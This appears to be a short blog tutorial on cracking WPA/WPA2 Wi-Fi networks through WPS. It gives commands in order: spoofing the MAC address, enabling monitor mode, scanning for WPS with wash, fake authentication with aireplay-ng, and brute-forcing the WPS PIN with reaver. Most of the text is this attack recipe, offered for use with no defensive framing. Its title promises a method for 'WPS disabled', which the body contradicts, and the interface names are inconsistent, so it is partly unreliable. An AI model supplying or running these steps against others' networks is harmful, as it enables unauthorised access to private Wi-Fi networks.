Hacking WPA/WPA2 With Reaver Wps Disabled

Mezen Sboui
1 min readApr 6, 2021

WPA/WPA2 Cracking
Both can be cracked using the same methods
Much more secure than WEP
Each packet is encrypted using a unique temporary key

Packet contain no useful information

Wps is a a feature that can be used with wpa & Wpa2
Allow clients to connect without the password
Authentication is done using 8 digit pin
Wps can be used to compute the actual password

Enabling Monitor mode

#ifconfig wlan0 down //shudown the interface
#ifconfig wlan0 hw ether 00:11:22:33:44:88 // change mac address for the interface
#ifconfig wlan0 up //
#airmon-ng check kill //kill any unwanted process that will afect our demo
#ifconfig wlan0 down
#iwconfig wlan0 mode monitor // enable a monitor mode
#ifconfig wlan0 up

First Screen
Preparation For the attack (WPA-WPA2)

if the victim use push button authentication the it will refuse all the pins that comes from reaver

#wash — interface wlan0 // display all the networks around us and look for a wps is enable or not

//associate with the network using fake authentication

#aireplay-ng — fakeauth 30 -a bssid -h MacOFwlan0 wlan0

Second Screen
Reaver too that will try every possible pin to attack
Brute Force the pin

#reaver -i wlan1 -b (bssid) B8:BC:1B:**:**:** -vv

